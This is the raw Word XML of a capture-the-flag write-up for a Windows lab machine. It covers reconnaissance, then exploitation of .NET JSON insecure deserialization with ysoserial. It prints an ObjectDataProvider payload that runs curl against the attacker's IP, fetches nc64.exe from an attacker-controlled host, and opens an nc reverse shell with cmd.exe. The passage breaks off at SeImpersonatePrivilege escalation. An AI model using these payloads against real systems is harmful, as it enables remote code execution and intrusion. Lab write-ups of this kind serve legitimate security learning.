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odyetaqudbjk"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7mmvp5dxrops"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5">
      <w:pPr>
        <w:jc w:val="cente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0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Montagne</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine. If support is required,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7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6sxwimz6yu7" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Initially, an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scan was executed to identify which ports were open on the target host.</w:t>
      </w:r>
    </w:p>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&lt;machine-ip&gt;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-vvv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:spacing w:after="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C">
      <w:pPr>
        <w:spacing w:after="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06800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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606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During the scan, ports </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">80 (HTTP)</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3389 (RDP)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> were identified as accessible on the host. When accessing the application via port 80, the web service interface was displayed.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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32100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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2832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homepage, the requested fields were filled in with a name and email address.</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21000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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921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request was intercepted using the Burp Suite proxy, and it was identified that the information was transmitted in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">format.</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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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273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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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095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confirming that the data was sent in JSON format, the application was evaluated for potential </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">insecure deserialization in .NET</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. For this purpose, </w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ysoserial</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  was used as a payload generation tool. Using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ysoserial</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a payload was generated specifically structured to execute an operating system command — in this case, a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows curl </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">call — to validate the possibility of remote code execution via the vulnerability.</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.\ysoserial.exe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ObjectDataProvider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&lt;machine-ip&gt;"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Json.Net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--jsonpretty</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65200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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965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The ysoserial tool generated the payload in JSON format using single quotes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In order for the request to be correctly interpreted by the application, the content was manually adjusted by replacing them with double quotes </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1E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>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1F">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0">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1">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"System.Windows.Data.ObjectDataProvider,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PresentationFramework,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Version=4.0.0.0,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Culture=neutral,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PublicKeyToken=31bf3856ad364e35",</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">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3">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">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5">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"MethodParameters":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6">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7">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"System.Collections.ArrayList,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mscorlib,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Version=4.0.0.0,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Culture=neutral,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PublicKeyToken=b77a5c561934e089",</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">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9">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A">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B">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"cmd",</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">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D">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&lt;ip-vpn&gt;"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">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F">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0">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1">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2">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3">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"ObjectInstance":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4">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5">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"System.Diagnostics.Process,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Version=4.0.0.0,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Culture=neutral,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PublicKeyToken=b77a5c561934e089"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">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7">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8">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9">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A">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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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2108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spacing w:after="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exploiting the insecure deserialization vulnerability, it was possible to confirm the flaw after observing that the application executed the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command targeting our IP, demonstrating remote execution of the supplied payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:spacing w:after="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F">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python3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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">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82600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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48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pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.n9r1w7hqte5p" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation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user flag</w:t>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confirmed remote execution, the post-exploitation phase began, aiming to establish an interactive session. For this purpose, a  </w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">nc (Netcat)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary was transferred to the server using curl from an attacker-controlled server. The binary was then executed to initiate a reverse shell, ensuring interactive access to the compromised system within the execution context of the vulnerable application.</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7">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"System.Windows.Data.ObjectDataProvider,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PresentationFramework,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Version=4.0.0.0,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Culture=neutral,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PublicKeyToken=31bf3856ad364e35",</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">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"MethodParameters":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D">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"System.Collections.ArrayList,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mscorlib,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Version=4.0.0.0,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Culture=neutral,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PublicKeyToken=b77a5c561934e089",</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">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1">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"cmd",</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">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&lt;ip-vpn&gt;/nc64.exe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nc.exe"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">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7">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9">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"ObjectInstance":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B">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"System.Diagnostics.Process,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Version=4.0.0.0,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Culture=neutral,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PublicKeyToken=b77a5c561934e089"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">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F">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2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The binary was successfully downloaded to the target machine using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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68600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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768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76300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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876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At this point, it was sufficient to execute the previously transferred </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary on the target machine using the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e cmd.exe flag.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> This option redirects terminal input and output directly to the attacker’s server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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nc.exe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&lt;ip-vpn&gt;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cmd.exe</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44800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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844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result, a fully interactive reverse shell session was successfully established, allowing remote control of the compromised system from the attacker’s console.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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638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pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.fijj29sf4rwb" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation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root flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">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the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> whoami /priv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command, it is possible to list all privileges associated with the currently running Windows user. This information allows evaluation of the available permission level and identification of privileges that may be exploited for privilege escalation.</w:t>
      </w:r>
    </w:p>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whoami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/priv</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09800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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2209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4">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was identified that the user has the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SeImpersonatePrivilege</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> enabled. This privilege is highly sensitive in Windows environments, as it allows the current process to assume the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> security token of another process with higher privileges,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided that a valid token can be captured or manipulated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">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escalate privileges using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SeImpersonatePrivilege</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
